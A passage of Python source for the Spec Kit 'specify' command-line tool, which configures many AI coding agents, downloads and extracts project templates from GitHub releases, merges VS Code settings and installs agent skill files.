"requires_cli": True,
},
"windsurf": {
"name": "Windsurf",
"folder": ".windsurf/",
"commands_subdir": "workflows", # Special: uses workflows/ not commands/
"install_url": None, # IDE-based
"requires_cli": False,
},
"kilocode": {
"name": "Kilo Code",
"folder": ".kilocode/",
"commands_subdir": "workflows", # Special: uses workflows/ not commands/
"install_url": None, # IDE-based
"requires_cli": False,
},
"auggie": {
"name": "Auggie CLI",
"folder": ".augment/",
"commands_subdir": "commands",
"install_url": "https://docs.augmentcode.com/cli/setup-auggie/install-auggie-cli",
"requires_cli": True,
},
"codebuddy": {
"name": "CodeBuddy",
"folder": ".codebuddy/",
"commands_subdir": "commands",
"install_url": "https://www.codebuddy.ai/cli",
"requires_cli": True,
},
"qodercli": {
"name": "Qoder CLI",
"folder": ".qoder/",
"commands_subdir": "commands",
"install_url": "https://qoder.com/cli",
"requires_cli": True,
},
"roo": {
"name": "Roo Code",
"folder": ".roo/",
"commands_subdir": "commands",
"install_url": None, # IDE-based
"requires_cli": False,
},
"kiro-cli": {
"name": "Kiro CLI",
"folder": ".kiro/",
"commands_subdir": "prompts", # Special: uses prompts/ not commands/
"install_url": "https://kiro.dev/docs/cli/",
"requires_cli": True,
},
"amp": {
"name": "Amp",
"folder": ".agents/",
"commands_subdir": "commands",
"install_url": "https://ampcode.com/manual#install",
"requires_cli": True,
},
"shai": {
"name": "SHAI",
"folder": ".shai/",
"commands_subdir": "commands",
"install_url": "https://github.com/ovh/shai",
"requires_cli": True,
},
"tabnine": {
"name": "Tabnine CLI",
"folder": ".tabnine/agent/",
"commands_subdir": "commands",
"install_url": "https://docs.tabnine.com/main/getting-started/tabnine-cli",
"requires_cli": True,
},
"agy": {
"name": "Antigravity",
"folder": ".agent/",
"commands_subdir": "commands",
"install_url": None, # IDE-based
"requires_cli": False,
},
"bob": {
"name": "IBM Bob",
"folder": ".bob/",
"commands_subdir": "commands",
"install_url": None, # IDE-based
"requires_cli": False,
},
"vibe": {
"name": "Mistral Vibe",
"folder": ".vibe/",
"commands_subdir": "prompts",
"install_url": "https://github.com/mistralai/mistral-vibe",
"requires_cli": True,
},
"kimi": {
"name": "Kimi Code",
"folder": ".kimi/",
"commands_subdir": "skills", # Kimi uses /skill:<name> with .kimi/skills/<name>/SKILL.md
"install_url": "https://code.kimi.com/",
"requires_cli": True,
},
"trae": {
"name": "Trae",
"folder": ".trae/",
"commands_subdir": "rules", # Trae uses .trae/rules/ for project rules
"install_url": None, # IDE-based
"requires_cli": False,
},
"pi": {
"name": "Pi Coding Agent",
"folder": ".pi/",
"commands_subdir": "prompts",
"install_url": "https://www.npmjs.com/package/@mariozechner/pi-coding-agent",
"requires_cli": True,
},
"generic": {
"name": "Generic (bring your own agent)",
"folder": None, # Set dynamically via --ai-commands-dir
"commands_subdir": "commands",
"install_url": None,
"requires_cli": False,
},
}
AI_ASSISTANT_ALIASES = {
"kiro": "kiro-cli",
}
def _build_ai_assistant_help() -> str:
non_generic_agents = sorted(agent for agent in AGENT_CONFIG if agent != "generic")
base_help = (
f"AI assistant to use: {', '.join(non_generic_agents)}, "
"or generic (requires --ai-commands-dir)."
)
if not AI_ASSISTANT_ALIASES:
return base_help
alias_phrases = []
for alias, target in sorted(AI_ASSISTANT_ALIASES.items()):
alias_phrases.append(f"'{alias}' as an alias for '{target}'")
if len(alias_phrases) == 1:
aliases_text = alias_phrases[0]
else:
aliases_text = ', '.join(alias_phrases[:-1]) + ' and ' + alias_phrases[-1]
return base_help + " Use " + aliases_text + "."
AI_ASSISTANT_HELP = _build_ai_assistant_help()
SCRIPT_TYPE_CHOICES = {"sh": "POSIX Shell (bash/zsh)", "ps": "PowerShell"}
CLAUDE_LOCAL_PATH = Path.home() / ".claude" / "local" / "claude"
BANNER = """
███████╗██████╗ ███████╗ ██████╗██╗███████╗██╗ ██╗
██╔════╝██╔══██╗██╔════╝██╔════╝██║██╔════╝╚██╗ ██╔╝
███████╗██████╔╝█████╗ ██║ ██║█████╗ ╚████╔╝
╚════██║██╔═══╝ ██╔══╝ ██║ ██║██╔══╝ ╚██╔╝
███████║██║ ███████╗╚██████╗██║██║ ██║
╚══════╝╚═╝ ╚══════╝ ╚═════╝╚═╝╚═╝ ╚═╝
"""
TAGLINE = "GitHub Spec Kit - Spec-Driven Development Toolkit"
class StepTracker:
def __init__(self, title: str):
self.title = title
self.steps = [] # list of dicts: {key, label, status, detail}
self.status_order = {"pending": 0, "running": 1, "done": 2, "error": 3, "skipped": 4}
self._refresh_cb = None # callable to trigger UI refresh
def attach_refresh(self, cb):
self._refresh_cb = cb
def add(self, key: str, label: str):
if key not in [s["key"] for s in self.steps]:
self.steps.append({"key": key, "label": label, "status": "pending", "detail": ""})
self._maybe_refresh()
def start(self, key: str, detail: str = ""):
self._update(key, status="running", detail=detail)
def complete(self, key: str, detail: str = ""):
self._update(key, status="done", detail=detail)
def error(self, key: str, detail: str = ""):
self._update(key, status="error", detail=detail)
def skip(self, key: str, detail: str = ""):
self._update(key, status="skipped", detail=detail)
def _update(self, key: str, status: str, detail: str):
for s in self.steps:
if s["key"] == key:
s["status"] = status
if detail:
s["detail"] = detail
self._maybe_refresh()
return
self.steps.append({"key": key, "label": key, "status": status, "detail": detail})
self._maybe_refresh()
def _maybe_refresh(self):
if self._refresh_cb:
try:
self._refresh_cb()
except Exception:
pass
def render(self):
tree = Tree(f"[cyan]{self.title}[/cyan]", guide_style="grey50")
for step in self.steps:
label = step["label"]
detail_text = step["detail"].strip() if step["detail"] else ""
status = step["status"]
if status == "done":
symbol = "[green]●[/green]"
elif status == "pending":
symbol = "[green dim]○[/green dim]"
elif status == "running":
symbol = "[cyan]○[/cyan]"
elif status == "error":
symbol = "[red]●[/red]"
elif status == "skipped":
symbol = "[yellow]○[/yellow]"
else:
symbol = " "
if status == "pending":
# Entire line light gray (pending)
if detail_text:
line = f"{symbol} [bright_black]{label} ({detail_text})[/bright_black]"
else:
line = f"{symbol} [bright_black]{label}[/bright_black]"
else:
# Label white, detail (if any) light gray in parentheses
if detail_text:
line = f"{symbol} [white]{label}[/white] [bright_black]({detail_text})[/bright_black]"
else:
line = f"{symbol} [white]{label}[/white]"
tree.add(line)
return tree
def get_key():
key = readchar.readkey()
if key == readchar.key.UP or key == readchar.key.CTRL_P:
return 'up'
if key == readchar.key.DOWN or key == readchar.key.CTRL_N:
return 'down'
if key == readchar.key.ENTER:
return 'enter'
if key == readchar.key.ESC:
return 'escape'
if key == readchar.key.CTRL_C:
raise KeyboardInterrupt
return key
def select_with_arrows(options: dict, prompt_text: str = "Select an option", default_key: str = None) -> str:
option_keys = list(options.keys())
if default_key and default_key in option_keys:
selected_index = option_keys.index(default_key)
else:
selected_index = 0
selected_key = None
def create_selection_panel():
table = Table.grid(padding=(0, 2))
table.add_column(style="cyan", justify="left", width=3)
table.add_column(style="white", justify="left")
for i, key in enumerate(option_keys):
if i == selected_index:
table.add_row("▶", f"[cyan]{key}[/cyan] [dim]({options[key]})[/dim]")
else:
table.add_row(" ", f"[cyan]{key}[/cyan] [dim]({options[key]})[/dim]")
table.add_row("", "")
table.add_row("", "[dim]Use ↑/↓ to navigate, Enter to select, Esc to cancel[/dim]")
return Panel(
table,
title=f"[bold]{prompt_text}[/bold]",
border_style="cyan",
padding=(1, 2)
)
console.print()
def run_selection_loop():
nonlocal selected_key, selected_index
with Live(create_selection_panel(), console=console, transient=True, auto_refresh=False) as live:
while True:
try:
key = get_key()
if key == 'up':
selected_index = (selected_index - 1) % len(option_keys)
elif key == 'down':
selected_index = (selected_index + 1) % len(option_keys)
elif key == 'enter':
selected_key = option_keys[selected_index]
break
elif key == 'escape':
console.print("\n[yellow]Selection cancelled[/yellow]")
raise typer.Exit(1)
live.update(create_selection_panel(), refresh=True)
except KeyboardInterrupt:
console.print("\n[yellow]Selection cancelled[/yellow]")
raise typer.Exit(1)
run_selection_loop()
if selected_key is None:
console.print("\n[red]Selection failed.[/red]")
raise typer.Exit(1)
return selected_key
console = Console()
class BannerGroup(TyperGroup):
def format_help(self, ctx, formatter):
# Show banner before help
show_banner()
super().format_help(ctx, formatter)
app = typer.Typer(
name="specify",
help="Setup tool for Specify spec-driven development projects",
add_completion=False,
invoke_without_command=True,
cls=BannerGroup,
)
def show_banner():
banner_lines = BANNER.strip().split('\n')
colors = ["bright_blue", "blue", "cyan", "bright_cyan", "white", "bright_white"]
styled_banner = Text()
for i, line in enumerate(banner_lines):
color = colors[i % len(colors)]
styled_banner.append(line + "\n", style=color)
console.print(Align.center(styled_banner))
console.print(Align.center(Text(TAGLINE, style="italic bright_yellow")))
console.print()
@app.callback()
def callback(ctx: typer.Context):
if ctx.invoked_subcommand is None and "--help" not in sys.argv and "-h" not in sys.argv:
show_banner()
console.print(Align.center("[dim]Run 'specify --help' for usage information[/dim]"))
console.print()
def run_command(cmd: list[str], check_return: bool = True, capture: bool = False, shell: bool = False) -> Optional[str]:
try:
if capture:
result = subprocess.run(cmd, check=check_return, capture_output=True, text=True, shell=shell)
return result.stdout.strip()
else:
subprocess.run(cmd, check=check_return, shell=shell)
return None
except subprocess.CalledProcessError as e:
if check_return:
console.print(f"[red]Error running command:[/red] {' '.join(cmd)}")
console.print(f"[red]Exit code:[/red] {e.returncode}")
if hasattr(e, 'stderr') and e.stderr:
console.print(f"[red]Error output:[/red] {e.stderr}")
raise
return None
def check_tool(tool: str, tracker: StepTracker = None) -> bool:
# Special handling for Claude CLI after `claude migrate-installer`
# See: https://github.com/github/spec-kit/issues/123
# The migrate-installer command REMOVES the original executable from PATH
# and creates an alias at ~/.claude/local/claude instead
# This path should be prioritized over other claude executables in PATH
if tool == "claude":
if CLAUDE_LOCAL_PATH.exists() and CLAUDE_LOCAL_PATH.is_file():
if tracker:
tracker.complete(tool, "available")
return True
if tool == "kiro-cli":
# Kiro currently supports both executable names. Prefer kiro-cli and
# accept kiro as a compatibility fallback.
found = shutil.which("kiro-cli") is not None or shutil.which("kiro") is not None
else:
found = shutil.which(tool) is not None
if tracker:
if found:
tracker.complete(tool, "available")
else:
tracker.error(tool, "not found")
return found
def is_git_repo(path: Path = None) -> bool:
if path is None:
path = Path.cwd()
if not path.is_dir():
return False
try:
# Use git command to check if inside a work tree
subprocess.run(
["git", "rev-parse", "--is-inside-work-tree"],
check=True,
capture_output=True,
cwd=path,
)
return True
except (subprocess.CalledProcessError, FileNotFoundError):
return False
def init_git_repo(project_path: Path, quiet: bool = False) -> Tuple[bool, Optional[str]]:
try:
original_cwd = Path.cwd()
os.chdir(project_path)
if not quiet:
console.print("[cyan]Initializing git repository...[/cyan]")
subprocess.run(["git", "init"], check=True, capture_output=True, text=True)
subprocess.run(["git", "add", "."], check=True, capture_output=True, text=True)
subprocess.run(["git", "commit", "-m", "Initial commit from Specify template"], check=True, capture_output=True, text=True)
if not quiet:
console.print("[green]✓[/green] Git repository initialized")
return True, None
except subprocess.CalledProcessError as e:
error_msg = f"Command: {' '.join(e.cmd)}\nExit code: {e.returncode}"
if e.stderr:
error_msg += f"\nError: {e.stderr.strip()}"
elif e.stdout:
error_msg += f"\nOutput: {e.stdout.strip()}"
if not quiet:
console.print(f"[red]Error initializing git repository:[/red] {e}")
return False, error_msg
finally:
os.chdir(original_cwd)
def handle_vscode_settings(sub_item, dest_file, rel_path, verbose=False, tracker=None) -> None:
def log(message, color="green"):
if verbose and not tracker:
console.print(f"[{color}]{message}[/] {rel_path}")
def atomic_write_json(target_file: Path, payload: dict[str, Any]) -> None:
temp_path: Optional[Path] = None
try:
with tempfile.NamedTemporaryFile(
mode='w',
encoding='utf-8',
dir=target_file.parent,
prefix=f"{target_file.name}.",
suffix=".tmp",
delete=False,
) as f:
temp_path = Path(f.name)
json.dump(payload, f, indent=4)
f.write('\n')
if target_file.exists():
try:
existing_stat = target_file.stat()
os.chmod(temp_path, stat.S_IMODE(existing_stat.st_mode))
if hasattr(os, "chown"):
try:
os.chown(temp_path, existing_stat.st_uid, existing_stat.st_gid)
except PermissionError:
# Best-effort owner/group preservation without requiring elevated privileges.
pass
except OSError:
# Best-effort metadata preservation; data safety is prioritized.
pass
os.replace(temp_path, target_file)
except Exception:
if temp_path and temp_path.exists():
temp_path.unlink()
raise
try:
with open(sub_item, 'r', encoding='utf-8') as f:
# json5 natively supports comments and trailing commas (JSONC)
new_settings = json5.load(f)
if dest_file.exists():
merged = merge_json_files(dest_file, new_settings, verbose=verbose and not tracker)
if merged is not None:
atomic_write_json(dest_file, merged)
log("Merged:", "green")
log("Note: comments/trailing commas are normalized when rewritten", "yellow")
else:
log("Skipped merge (preserved existing settings)", "yellow")
else:
shutil.copy2(sub_item, dest_file)
log("Copied (no existing settings.json):", "blue")
except Exception as e:
log(f"Warning: Could not merge settings: {e}", "yellow")
if not dest_file.exists():
shutil.copy2(sub_item, dest_file)
def merge_json_files(existing_path: Path, new_content: Any, verbose: bool = False) -> Optional[dict[str, Any]]:
# Load existing content first to have a safe fallback
existing_content = None
exists = existing_path.exists()
if exists:
try:
with open(existing_path, 'r', encoding='utf-8') as f:
# Handle comments (JSONC) natively with json5
# Note: json5 handles BOM automatically
existing_content = json5.load(f)
except FileNotFoundError:
# Handle race condition where file is deleted after exists() check
exists = False
except Exception as e:
if verbose:
console.print(f"[yellow]Warning: Could not read or parse existing JSON in {existing_path.name} ({e}).[/yellow]")
# Skip merge to preserve existing file if unparseable or inaccessible (e.g. PermissionError)
return None
# Validate template content
if not isinstance(new_content, dict):
if verbose:
console.print(f"[yellow]Warning: Template content for {existing_path.name} is not a dictionary. Preserving existing settings.[/yellow]")
return None
if not exists:
return new_content
# If existing content parsed but is not a dict, skip merge to avoid data loss
if not isinstance(existing_content, dict):
if verbose:
console.print(f"[yellow]Warning: Existing JSON in {existing_path.name} is not an object. Skipping merge to avoid data loss.[/yellow]")
return None
def deep_merge_polite(base: dict[str, Any], update: dict[str, Any]) -> dict[str, Any]:
result = base.copy()
for key, value in update.items():
if key not in result:
# Add new key
result[key] = value
elif isinstance(result[key], dict) and isinstance(value, dict):
# Recursively merge nested dictionaries
result[key] = deep_merge_polite(result[key], value)
else:
# Key already exists and values are not both dicts; preserve existing value.
# This ensures user settings aren't overwritten by template defaults.
pass
return result
merged = deep_merge_polite(existing_content, new_content)
# Detect if anything actually changed. If not, return None so the caller
# can skip rewriting the file (preserving user's comments/formatting).
if merged == existing_content:
return None
if verbose:
console.print(f"[cyan]Merged JSON file:[/cyan] {existing_path.name}")
return merged
def download_template_from_github(ai_assistant: str, download_dir: Path, *, script_type: str = "sh", verbose: bool = True, show_progress: bool = True, client: httpx.Client = None, debug: bool = False, github_token: str = None) -> Tuple[Path, dict]:
repo_owner = "github"
repo_name = "spec-kit"
if client is None:
client = httpx.Client(verify=ssl_context)
if verbose:
console.print("[cyan]Fetching latest release information...[/cyan]")
api_url = f"https://api.github.com/repos/{repo_owner}/{repo_name}/releases/latest"
try:
response = client.get(
api_url,
timeout=30,
follow_redirects=True,
headers=_github_auth_headers(github_token),
)
status = response.status_code
if status != 200:
# Format detailed error message with rate-limit info
error_msg = _format_rate_limit_error(status, response.headers, api_url)
if debug:
error_msg += f"\n\n[dim]Response body (truncated 500):[/dim]\n{response.text[:500]}"
raise RuntimeError(error_msg)
try:
release_data = response.json()
except ValueError as je:
raise RuntimeError(f"Failed to parse release JSON: {je}\nRaw (truncated 400): {response.text[:400]}")
except Exception as e:
console.print("[red]Error fetching release information[/red]")
console.print(Panel(str(e), title="Fetch Error", border_style="red"))
raise typer.Exit(1)
assets = release_data.get("assets", [])
pattern = f"spec-kit-template-{ai_assistant}-{script_type}"
matching_assets = [
asset for asset in assets
if pattern in asset["name"] and asset["name"].endswith(".zip")
]
asset = matching_assets[0] if matching_assets else None
if asset is None:
console.print(f"[red]No matching release asset found[/red] for [bold]{ai_assistant}[/bold] (expected pattern: [bold]{pattern}[/bold])")
asset_names = [a.get('name', '?') for a in assets]
console.print(Panel("\n".join(asset_names) or "(no assets)", title="Available Assets", border_style="yellow"))
raise typer.Exit(1)
download_url = asset["browser_download_url"]
filename = asset["name"]
file_size = asset["size"]
if verbose:
console.print(f"[cyan]Found template:[/cyan] {filename}")
console.print(f"[cyan]Size:[/cyan] {file_size:,} bytes")
console.print(f"[cyan]Release:[/cyan] {release_data['tag_name']}")
zip_path = download_dir / filename
if verbose:
console.print("[cyan]Downloading template...[/cyan]")
try:
with client.stream(
"GET",
download_url,
timeout=60,
follow_redirects=True,
headers=_github_auth_headers(github_token),
) as response:
if response.status_code != 200:
# Handle rate-limiting on download as well
error_msg = _format_rate_limit_error(response.status_code, response.headers, download_url)
if debug:
error_msg += f"\n\n[dim]Response body (truncated 400):[/dim]\n{response.text[:400]}"
raise RuntimeError(error_msg)
total_size = int(response.headers.get('content-length', 0))
with open(zip_path, 'wb') as f:
if total_size == 0:
for chunk in response.iter_bytes(chunk_size=8192):
f.write(chunk)
else:
if show_progress:
with Progress(
SpinnerColumn(),
TextColumn("[progress.description]{task.description}"),
TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
console=console,
) as progress:
task = progress.add_task("Downloading...", total=total_size)
downloaded = 0
for chunk in response.iter_bytes(chunk_size=8192):
f.write(chunk)
downloaded += len(chunk)
progress.update(task, completed=downloaded)
else:
for chunk in response.iter_bytes(chunk_size=8192):
f.write(chunk)
except Exception as e:
console.print("[red]Error downloading template[/red]")
detail = str(e)
if zip_path.exists():
zip_path.unlink()
console.print(Panel(detail, title="Download Error", border_style="red"))
raise typer.Exit(1)
if verbose:
console.print(f"Downloaded: {filename}")
metadata = {
"filename": filename,
"size": file_size,
"release": release_data["tag_name"],
"asset_url": download_url
}
return zip_path, metadata
def download_and_extract_template(project_path: Path, ai_assistant: str, script_type: str, is_current_dir: bool = False, *, verbose: bool = True, tracker: StepTracker | None = None, client: httpx.Client = None, debug: bool = False, github_token: str = None) -> Path:
current_dir = Path.cwd()
if tracker:
tracker.start("fetch", "contacting GitHub API")
try:
zip_path, meta = download_template_from_github(
ai_assistant,
current_dir,
script_type=script_type,
verbose=verbose and tracker is None,
show_progress=(tracker is None),
client=client,
debug=debug,
github_token=github_token
)
if tracker:
tracker.complete("fetch", f"release {meta['release']} ({meta['size']:,} bytes)")
tracker.add("download", "Download template")
tracker.complete("download", meta['filename'])
except Exception as e:
if tracker:
tracker.error("fetch", str(e))
else:
if verbose:
console.print(f"[red]Error downloading template:[/red] {e}")
raise
if tracker:
tracker.add("extract", "Extract template")
tracker.start("extract")
elif verbose:
console.print("Extracting template...")
try:
if not is_current_dir:
project_path.mkdir(parents=True)
with zipfile.ZipFile(zip_path, 'r') as zip_ref:
zip_contents = zip_ref.namelist()
if tracker:
tracker.start("zip-list")
tracker.complete("zip-list", f"{len(zip_contents)} entries")
elif verbose:
console.print(f"[cyan]ZIP contains {len(zip_contents)} items[/cyan]")
if is_current_dir:
with tempfile.TemporaryDirectory() as temp_dir:
temp_path = Path(temp_dir)
zip_ref.extractall(temp_path)
extracted_items = list(temp_path.iterdir())
if tracker:
tracker.start("extracted-summary")
tracker.complete("extracted-summary", f"temp {len(extracted_items)} items")
elif verbose:
console.print(f"[cyan]Extracted {len(extracted_items)} items to temp location[/cyan]")
source_dir = temp_path
if len(extracted_items) == 1 and extracted_items[0].is_dir():
source_dir = extracted_items[0]
if tracker:
tracker.add("flatten", "Flatten nested directory")
tracker.complete("flatten")
elif verbose:
console.print("[cyan]Found nested directory structure[/cyan]")
for item in source_dir.iterdir():
dest_path = project_path / item.name
if item.is_dir():
if dest_path.exists():
if verbose and not tracker:
console.print(f"[yellow]Merging directory:[/yellow] {item.name}")
for sub_item in item.rglob('*'):
if sub_item.is_file():
rel_path = sub_item.relative_to(item)
dest_file = dest_path / rel_path
dest_file.parent.mkdir(parents=True, exist_ok=True)
# Special handling for .vscode/settings.json - merge instead of overwrite
if dest_file.name == "settings.json" and dest_file.parent.name == ".vscode":
handle_vscode_settings(sub_item, dest_file, rel_path, verbose, tracker)
else:
shutil.copy2(sub_item, dest_file)
else:
shutil.copytree(item, dest_path)
else:
if dest_path.exists() and verbose and not tracker:
console.print(f"[yellow]Overwriting file:[/yellow] {item.name}")
shutil.copy2(item, dest_path)
if verbose and not tracker:
console.print("[cyan]Template files merged into current directory[/cyan]")
else:
zip_ref.extractall(project_path)
extracted_items = list(project_path.iterdir())
if tracker:
tracker.start("extracted-summary")
tracker.complete("extracted-summary", f"{len(extracted_items)} top-level items")
elif verbose:
console.print(f"[cyan]Extracted {len(extracted_items)} items to {project_path}:[/cyan]")
for item in extracted_items:
console.print(f" - {item.name} ({'dir' if item.is_dir() else 'file'})")
if len(extracted_items) == 1 and extracted_items[0].is_dir():
nested_dir = extracted_items[0]
temp_move_dir = project_path.parent / f"{project_path.name}_temp"
shutil.move(str(nested_dir), str(temp_move_dir))
project_path.rmdir()
shutil.move(str(temp_move_dir), str(project_path))
if tracker:
tracker.add("flatten", "Flatten nested directory")
tracker.complete("flatten")
elif verbose:
console.print("[cyan]Flattened nested directory structure[/cyan]")
except Exception as e:
if tracker:
tracker.error("extract", str(e))
else:
if verbose:
console.print(f"[red]Error extracting template:[/red] {e}")
if debug:
console.print(Panel(str(e), title="Extraction Error", border_style="red"))
if not is_current_dir and project_path.exists():
shutil.rmtree(project_path)
raise typer.Exit(1)
else:
if tracker:
tracker.complete("extract")
finally:
if tracker:
tracker.add("cleanup", "Remove temporary archive")
if zip_path.exists():
zip_path.unlink()
if tracker:
tracker.complete("cleanup")
elif verbose:
console.print(f"Cleaned up: {zip_path.name}")
return project_path
def ensure_executable_scripts(project_path: Path, tracker: StepTracker | None = None) -> None:
if os.name == "nt":
return # Windows: skip silently
scripts_root = project_path / ".specify" / "scripts"
if not scripts_root.is_dir():
return
failures: list[str] = []
updated = 0
for script in scripts_root.rglob("*.sh"):
try:
if script.is_symlink() or not script.is_file():
continue
try:
with script.open("rb") as f:
if f.read(2) != b"#!":
continue
except Exception:
continue
st = script.stat()
mode = st.st_mode
if mode & 0o111:
continue
new_mode = mode
if mode & 0o400:
new_mode |= 0o100
if mode & 0o040:
new_mode |= 0o010
if mode & 0o004:
new_mode |= 0o001
if not (new_mode & 0o100):
new_mode |= 0o100
os.chmod(script, new_mode)
updated += 1
except Exception as e:
failures.append(f"{script.relative_to(scripts_root)}: {e}")
if tracker:
detail = f"{updated} updated" + (f", {len(failures)} failed" if failures else "")
tracker.add("chmod", "Set script permissions recursively")
(tracker.error if failures else tracker.complete)("chmod", detail)
else:
if updated:
console.print(f"[cyan]Updated execute permissions on {updated} script(s) recursively[/cyan]")
if failures:
console.print("[yellow]Some scripts could not be updated:[/yellow]")
for f in failures:
console.print(f" - {f}")
def ensure_constitution_from_template(project_path: Path, tracker: StepTracker | None = None) -> None:
memory_constitution = project_path / ".specify" / "memory" / "constitution.md"
template_constitution = project_path / ".specify" / "templates" / "constitution-template.md"
# If constitution already exists in memory, preserve it
if memory_constitution.exists():
if tracker:
tracker.add("constitution", "Constitution setup")
tracker.skip("constitution", "existing file preserved")
return
# If template doesn't exist, something went wrong with extraction
if not template_constitution.exists():
if tracker:
tracker.add("constitution", "Constitution setup")
tracker.error("constitution", "template not found")
return
# Copy template to memory directory
try:
memory_constitution.parent.mkdir(parents=True, exist_ok=True)
shutil.copy2(template_constitution, memory_constitution)
if tracker:
tracker.add("constitution", "Constitution setup")
tracker.complete("constitution", "copied from template")
else:
console.print("[cyan]Initialized constitution from template[/cyan]")
except Exception as e:
if tracker:
tracker.add("constitution", "Constitution setup")
tracker.error("constitution", str(e))
else:
console.print(f"[yellow]Warning: Could not initialize constitution: {e}[/yellow]")
INIT_OPTIONS_FILE = ".specify/init-options.json"
def save_init_options(project_path: Path, options: dict[str, Any]) -> None:
dest = project_path / INIT_OPTIONS_FILE
dest.parent.mkdir(parents=True, exist_ok=True)
dest.write_text(json.dumps(options, indent=2, sort_keys=True))
def load_init_options(project_path: Path) -> dict[str, Any]:
path = project_path / INIT_OPTIONS_FILE
if not path.exists():
return {}
try:
return json.loads(path.read_text())
except (json.JSONDecodeError, OSError):
return {}
# Agent-specific skill directory overrides for agents whose skills directory
# doesn't follow the standard <agent_folder>/skills/ pattern
AGENT_SKILLS_DIR_OVERRIDES = {
"codex": ".agents/skills", # Codex agent layout override
}
# Default skills directory for agents not in AGENT_CONFIG
DEFAULT_SKILLS_DIR = ".agents/skills"
# Enhanced descriptions for each spec-kit command skill
SKILL_DESCRIPTIONS = {
"specify": "Create or update feature specifications from natural language descriptions. Use when starting new features or refining requirements. Generates spec.md with user stories, functional requirements, and acceptance criteria following spec-driven development methodology.",
"plan": "Generate technical implementation plans from feature specifications. Use after creating a spec to define architecture, tech stack, and implementation phases. Creates plan.md with detailed technical design.",
"tasks": "Break down implementation plans into actionable task lists. Use after planning to create a structured task breakdown. Generates tasks.md with ordered, dependency-aware tasks.",
"implement": "Execute all tasks from the task breakdown to build the feature. Use after task generation to systematically implement the planned solution following TDD approach where applicable.",
"analyze": "Perform cross-artifact consistency analysis across spec.md, plan.md, and tasks.md. Use after task generation to identify gaps, duplications, and inconsistencies before implementation.",
"clarify": "Structured clarification workflow for underspecified requirements. Use before planning to resolve ambiguities through coverage-based questioning. Records answers in spec clarifications section.",
"constitution": "Create or update project governing principles and development guidelines. Use at project start to establish code quality, testing standards, and architectural constraints that guide all development.",
"checklist": "Generate custom quality checklists for validating requirements completeness and clarity. Use to create unit tests for English that ensure spec quality before implementation.",
"taskstoissues": "Convert tasks from tasks.md into GitHub issues. Use after task breakdown to track work items in GitHub project management.",
}
def _get_skills_dir(project_path: Path, selected_ai: str) -> Path:
if selected_ai in AGENT_SKILLS_DIR_OVERRIDES:
return project_path / AGENT_SKILLS_DIR_OVERRIDES[selected_ai]
agent_config = AGENT_CONFIG.get(selected_ai, {})
agent_folder = agent_config.get("folder", "")
if agent_folder:
return project_path / agent_folder.rstrip("/") / "skills"
return project_path / DEFAULT_SKILLS_DIR
def install_ai_skills(project_path: Path, selected_ai: str, tracker: StepTracker | None = None) -> bool:
# Locate command templates in the agent's extracted commands directory.
# download_and_extract_template() already placed the .md files here.
agent_config = AGENT_CONFIG.get(selected_ai, {})
agent_folder = agent_config.get("folder", "")
commands_subdir = agent_config.get("commands_subdir", "commands")
if agent_folder:
templates_dir = project_path / agent_folder.rstrip("/") / commands_subdir
else:
templates_dir = project_path / commands_subdir
# Only consider speckit.*.md templates so that user-authored command
# files (e.g. custom slash commands, agent files) coexisting in the
# same commands directory are not incorrectly converted into skills.
template_glob = "speckit.*.md"
if not templates_dir.exists() or not any(templates_dir.glob(template_glob)):
# Fallback: try the repo-relative path (for running from source checkout)
# This also covers agents whose extracted commands are in a different
# format (e.g. gemini/tabnine use .toml, not .md).
script_dir = Path(__file__).parent.parent.parent # up from src/specify_cli/
fallback_dir = script_dir / "templates" / "commands"
if fallback_dir.exists() and any(fallback_dir.glob("*.md")):
templates_dir = fallback_dir
template_glob = "*.md"
if not templates_dir.exists() or not any(templates_dir.glob(template_glob)):
if tracker:
tracker.error("ai-skills", "command templates not found")
else:
console.print("[yellow]Warning: command templates not found, skipping skills installation[/yellow]")
return False
command_files = sorted(templates_dir.glob(template_glob))
if not command_files:
if tracker:
tracker.skip("ai-skills", "no command templates found")
else:
console.print("[yellow]No command templates found to install[/yellow]")
return False
# Resolve the correct skills directory for this agent
skills_dir = _get_skills_dir(project_path, selected_ai)
skills_dir.mkdir(parents=True, exist_ok=True)
if tracker:
tracker.start("ai-skills")
installed_count = 0
skipped_count = 0
for command_file in command_files:
try:
content = command_file.read_text(encoding="utf-8")
# Parse YAML frontmatter
if content.startswith("---"):
parts = content.split("---", 2)
if len(parts) >= 3:
frontmatter = yaml.safe_load(parts[1])
if not isinstance(frontmatter, dict):
frontmatter = {}
body = parts[2].strip()
else:
# File starts with --- but has no closing ---
console.print(f"[yellow]Warning: {command_file.name} has malformed frontmatter (no closing ---), treating as plain content[/yellow]")
frontmatter = {}
body = content
else:
frontmatter = {}
body = content
command_name = command_file.stem
# Normalize: extracted commands may be named "speckit.<cmd>.md"
# or "speckit.<cmd>.agent.md"; strip the "speckit." prefix and
# any trailing ".agent" suffix so skill names stay clean and
# SKILL_DESCRIPTIONS lookups work.
if command_name.startswith("speckit."):
command_name = command_name[len("speckit."):]
if command_name.endswith(".agent"):
command_name = command_name[:-len(".agent")]
# Kimi CLI discovers skills by directory name and invokes them as
# /skill:<name> — use dot separator to match packaging convention.
if selected_ai == "kimi":
skill_name = f"speckit.{command_name}"
else:
skill_name = f"speckit-{command_name}"
# Create skill directory (additive — never removes existing content)
skill_dir = skills_dir / skill_name
skill_dir.mkdir(parents=True, exist_ok=True)
# Select the best description available
original_desc = frontmatter.get("description", "")
enhanced_desc = SKILL_DESCRIPTIONS.get(command_name, original_desc or f"Spec-kit workflow command: {command_name}")
# Build SKILL.md following agentskills.io spec
# Use yaml.safe_dump to safely serialise the frontmatter and
# avoid YAML injection from descriptions containing colons,
# quotes, or newlines.
# Normalize source filename for metadata — strip speckit. prefix
# so it matches the canonical templates/commands/<cmd>.md path.
source_name = command_file.name
if source_name.startswith("speckit."):
source_name = source_name[len("speckit."):]
if source_name.endswith(".agent.md"):
source_name = source_name[:-len(".agent.md")] + ".md"
frontmatter_data = {
"name": skill_name,
"description": enhanced_desc,
"compatibility": "Requires spec-kit project structure with .specify/ directory",
"metadata": {
"author": "github-spec-kit",
"source": f"templates/commands/{source_name}",
},
}
frontmatter_text = yaml.safe_dump(frontmatter_data, sort_keys=False).strip()
skill_content = (
f"---\n"
f"{frontmatter_text}\n"
f"---\n\n"
f"# Speckit {command_name.title()} Skill\n\n"
f"{body}\n"
)
skill_file = skill_dir / "SKILL.md"
if skill_file.exists():
# Do not overwrite user-customized skills on re-runs
skipped_count += 1
continue
